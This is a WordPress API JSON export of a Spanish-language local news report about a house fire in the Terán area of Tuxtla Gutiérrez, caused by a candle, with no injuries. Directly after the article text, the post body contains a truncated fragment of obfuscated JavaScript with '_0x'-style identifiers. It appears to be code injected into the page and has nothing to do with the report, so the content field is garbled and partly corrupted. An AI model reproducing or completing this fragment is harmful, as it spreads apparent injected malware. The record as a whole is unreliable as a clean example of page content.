{"id":6334,"date":"2022-11-03T04:37:22","date_gmt":"2022-11-03T04:37:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6334"},"modified":"2022-11-03T04:37:23","modified_gmt":"2022-11-03T04:37:23","slug":"se-registra-incendio-en-vivienda-de-teran","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6334","title":{"rendered":"Se registra incendio en vivienda de Ter\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221102-WA0035-1024x576.jpg\" alt=\"\" class=\"wp-image-6335\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221102-WA0035-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221102-WA0035-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221102-WA0035-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221102-WA0035-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/11\/IMG-20221102-WA0035.jpg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p> Jairo Camacho.Agencia ReporteCiudadano, 2 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Una humilde vivienda fue consumida por un incendio este mi\u00e9rcoles por la noche en las inmediaciones de la delegaci\u00f3n Ter\u00e1n.Los testigos de este hecho informaron que, el siniestro se origin\u00f3 cerca de las 18 horas en la casa localizada en en la S\u00e9ptima Oriente Sur.Los mismos vecinos lograron rescatar a una persona de la tercera edad la cual habita sola en la vivienda y llamaron a los n\u00fameros de emergencias.Elementos del Cuerpo de Bomberos arribaron al lugar para combatir el incendio que amenazaba con propagarse a otros comercios y al mercado.Con el apoyo de tres pipas lograron controlar las llamas y sofocar el incendio.En el lugar se di\u00f3 a conocer que la causa fue una veladora, afortunadamente no hubo heridas pero s\u00ed perdidas materiales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 2 de noviembre del 2022. Tuxtla Guti\u00e9rrez.- Una humilde vivienda fue consumida por un incendio este mi\u00e9rcoles por la noche en las inmediaciones de la delegaci\u00f3n Ter\u00e1n.Los testigos de este hecho informaron que, el siniestro se origin\u00f3 cerca de las 18 horas en la casa localizada en en la S\u00e9ptima Oriente Sur.Los &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6335,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-6334","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6334","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6334"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6334\/revisions"}],"predecessor-version":[{"id":6336,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6334\/revisions\/6336"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6335"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6334"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6334"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6334"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}